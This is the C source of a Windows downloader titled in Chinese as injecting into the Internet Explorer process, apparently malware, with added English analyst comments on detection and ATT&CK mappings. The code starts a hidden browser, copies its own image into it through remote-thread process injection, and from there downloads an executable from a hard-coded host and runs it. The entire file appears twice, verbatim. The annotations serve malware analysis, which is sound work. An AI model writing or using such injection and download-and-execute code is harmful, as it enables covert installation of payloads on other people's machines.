插入IE进程的下载者源代码
/*
"mini_downloader"
code bykardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
// The next four linker options are commented out; the author's note says that
// enabling them produces a compiled file of only about 2 KB.
//#pragma comment(linker, "/OPT:NOWIN98")
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
// main() is made the image entry point, the subsystem is "windows", and the
// preferred load address is fixed at 0x13150000.
// Analyst note: main() in this file requests memory in the target process at
// this module's own base address and copies the image there unchanged, so a
// private executable region at this non-default base inside a browser process
// is a useful triage signal.
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
// Both function pointers are filled in by download() through
// LoadLibrary/GetProcAddress. As far as this file shows, the two APIs are never
// referenced statically, so import-table triage alone would miss them; their
// names remain visible as plain string literals in download().
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );// set at run time to ShellExecuteA from shell32.dll
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);// set at run time to URLDownloadToFileA from urlmon.dll
// Handle to the target process; opened and closed in main().
HANDLE processhandle;
// Process id owning the "IEFrame" window located in main().
DWORD pid;
// Module handles for shell32.dll and urlmon.dll, set in download().
HINSTANCE hshell,hurlmon;
// Payload routine. main() passes this function's address to
// CreateRemoteThread, so it is meant to run as a thread inside the target
// process rather than in this program.
//
// It loads shell32.dll and urlmon.dll, resolves ShellExecuteA and
// URLDownloadToFileA by name, saves http://192.168.0.188/1.exe as c://1.exe,
// opens the saved file, and then ends the hosting process with ExitProcess(0).
// No return value is checked: a failed LoadLibrary/GetProcAddress leaves a NULL
// function pointer that is then called, and a failed download still reaches the
// ShellExecuteA call.
//
// Analyst notes (detection):
// - The URL host is a private (RFC 1918) address, i.e. a lab value rather than
//   a usable network indicator; the behavior is the signal, not the address.
// - Observable effects when this runs inside a browser process: urlmon.dll
//   fetching an .exe over plain HTTP, an executable written to the root of C:,
//   that file started as a child of the browser (ATT&CK T1105 followed by
//   execution), and the browser process exiting immediately afterwards.
void download() // routine used as the injected thread's start address
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
// Resolve both APIs by name into the global function pointers.
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
// Download to a fixed path; the result code is discarded.
DOWNFILE(NULL,"http://192.168.0.188/1.exe","c://1.exe",0, NULL);
// "open" verb on the downloaded file; the last argument 5 is SW_SHOW.
SHELLRUN(0,"open","c://1.exe",NULL,NULL,5);
// Terminates whichever process this thread is running in.
ExitProcess(0);
};
// Entry point: starts a hidden Internet Explorer instance, copies this
// program's own in-memory image into an Internet Explorer process, and starts
// a remote thread there at download().
//
// None of the Win32 return values below are checked, so any failing step
// (window not found, process not opened, allocation refused) is silently
// carried into the next call.
//
// Analyst notes (detection):
// - The sequence OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(
//   PAGE_EXECUTE_READWRITE) -> WriteProcessMemory -> CreateRemoteThread against
//   another process is classic process injection (MITRE ATT&CK T1055; copying
//   a whole PE image corresponds to T1055.002).
// - Useful telemetry: full-access cross-process handle requests to
//   iexplore.exe (e.g. Sysmon event ID 10), remote thread creation (Sysmon
//   event ID 8), and a thread whose start address lies in private,
//   non-image-backed RWX memory.
// - IEXPLORE.EXE started with SW_HIDE by a non-browser parent is anomalous on
//   its own.
void main() // program entry point
{
// 1. Build the Internet Explorer path and launch it.
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
// Keep only the first 3 characters of the Windows directory (the drive root);
// iename was zeroed above, so the result is still NUL-terminated.
strncpy(iename,iepath,3);
// Hard-coded install path appended to the drive root.
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
//strcat(iename,"windows//notepad.EXE");
// Launch with the window hidden, then wait 2 seconds (presumably so the
// browser window exists before the lookup below).
WinExec(iename,SW_HIDE);
Sleep(2000);
// 2. Get a handle to the IE process.
HWND htemp;
// Matches a top-level window of class "IEFrame"; nothing ties it to the
// instance launched above.
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
// 3. Allocate memory in the target process.
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);// base address of this process's own image
// Get the size of the in-memory image: read the DWORD at base+0x3c (e_lfanew
// in the DOS header), then the DWORD at base+e_lfanew+0x50, which for a 32-bit
// PE is OptionalHeader.SizeOfImage. The value is carried in lpimagesize, which
// is declared as a pointer but used here as a plain integer.
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);// request the region at the same address as this module's own base, as read/write/execute
// 4. Write the memory and create the thread.
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);// copy this process's whole image into the target
LPTHREAD_START_ROUTINE entrypoint;
// Take the address of download() as the thread start routine.
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
// Module is passed as the thread parameter, which download() does not use; the
// returned thread handle is neither kept nor closed.
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); // create and start the remote thread
// 5. Close the process handle, wait 5 seconds, and return.
CloseHandle(processhandle);
Sleep(5000);
return;
};
/*
"mini_downloader"
code bykardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
// The next four linker options are commented out; the author's note says that
// enabling them produces a compiled file of only about 2 KB.
//#pragma comment(linker, "/OPT:NOWIN98")
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
// main() is made the image entry point, the subsystem is "windows", and the
// preferred load address is fixed at 0x13150000.
// Analyst note: main() in this file requests memory in the target process at
// this module's own base address and copies the image there unchanged, so a
// private executable region at this non-default base inside a browser process
// is a useful triage signal.
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
// Both function pointers are filled in by download() through
// LoadLibrary/GetProcAddress. As far as this file shows, the two APIs are never
// referenced statically, so import-table triage alone would miss them; their
// names remain visible as plain string literals in download().
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );// set at run time to ShellExecuteA from shell32.dll
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);// set at run time to URLDownloadToFileA from urlmon.dll
// Handle to the target process; opened and closed in main().
HANDLE processhandle;
// Process id owning the "IEFrame" window located in main().
DWORD pid;
// Module handles for shell32.dll and urlmon.dll, set in download().
HINSTANCE hshell,hurlmon;
// Payload routine. main() passes this function's address to
// CreateRemoteThread, so it is meant to run as a thread inside the target
// process rather than in this program.
//
// It loads shell32.dll and urlmon.dll, resolves ShellExecuteA and
// URLDownloadToFileA by name, saves http://192.168.0.188/1.exe as c://1.exe,
// opens the saved file, and then ends the hosting process with ExitProcess(0).
// No return value is checked: a failed LoadLibrary/GetProcAddress leaves a NULL
// function pointer that is then called, and a failed download still reaches the
// ShellExecuteA call.
//
// Analyst notes (detection):
// - The URL host is a private (RFC 1918) address, i.e. a lab value rather than
//   a usable network indicator; the behavior is the signal, not the address.
// - Observable effects when this runs inside a browser process: urlmon.dll
//   fetching an .exe over plain HTTP, an executable written to the root of C:,
//   that file started as a child of the browser (ATT&CK T1105 followed by
//   execution), and the browser process exiting immediately afterwards.
void download() // routine used as the injected thread's start address
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
// Resolve both APIs by name into the global function pointers.
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
// Download to a fixed path; the result code is discarded.
DOWNFILE(NULL,"http://192.168.0.188/1.exe","c://1.exe",0, NULL);
// "open" verb on the downloaded file; the last argument 5 is SW_SHOW.
SHELLRUN(0,"open","c://1.exe",NULL,NULL,5);
// Terminates whichever process this thread is running in.
ExitProcess(0);
};
// Entry point: starts a hidden Internet Explorer instance, copies this
// program's own in-memory image into an Internet Explorer process, and starts
// a remote thread there at download().
//
// None of the Win32 return values below are checked, so any failing step
// (window not found, process not opened, allocation refused) is silently
// carried into the next call.
//
// Analyst notes (detection):
// - The sequence OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(
//   PAGE_EXECUTE_READWRITE) -> WriteProcessMemory -> CreateRemoteThread against
//   another process is classic process injection (MITRE ATT&CK T1055; copying
//   a whole PE image corresponds to T1055.002).
// - Useful telemetry: full-access cross-process handle requests to
//   iexplore.exe (e.g. Sysmon event ID 10), remote thread creation (Sysmon
//   event ID 8), and a thread whose start address lies in private,
//   non-image-backed RWX memory.
// - IEXPLORE.EXE started with SW_HIDE by a non-browser parent is anomalous on
//   its own.
void main() // program entry point
{
// 1. Build the Internet Explorer path and launch it.
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
// Keep only the first 3 characters of the Windows directory (the drive root);
// iename was zeroed above, so the result is still NUL-terminated.
strncpy(iename,iepath,3);
// Hard-coded install path appended to the drive root.
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
//strcat(iename,"windows//notepad.EXE");
// Launch with the window hidden, then wait 2 seconds (presumably so the
// browser window exists before the lookup below).
WinExec(iename,SW_HIDE);
Sleep(2000);
// 2. Get a handle to the IE process.
HWND htemp;
// Matches a top-level window of class "IEFrame"; nothing ties it to the
// instance launched above.
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
// 3. Allocate memory in the target process.
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);// base address of this process's own image
// Get the size of the in-memory image: read the DWORD at base+0x3c (e_lfanew
// in the DOS header), then the DWORD at base+e_lfanew+0x50, which for a 32-bit
// PE is OptionalHeader.SizeOfImage. The value is carried in lpimagesize, which
// is declared as a pointer but used here as a plain integer.
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);// request the region at the same address as this module's own base, as read/write/execute
// 4. Write the memory and create the thread.
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);// copy this process's whole image into the target
LPTHREAD_START_ROUTINE entrypoint;
// Take the address of download() as the thread start routine.
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
// Module is passed as the thread parameter, which download() does not use; the
// returned thread handle is neither kept nor closed.
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); // create and start the remote thread
// 5. Close the process handle, wait 5 seconds, and return.
CloseHandle(processhandle);
Sleep(5000);
return;
};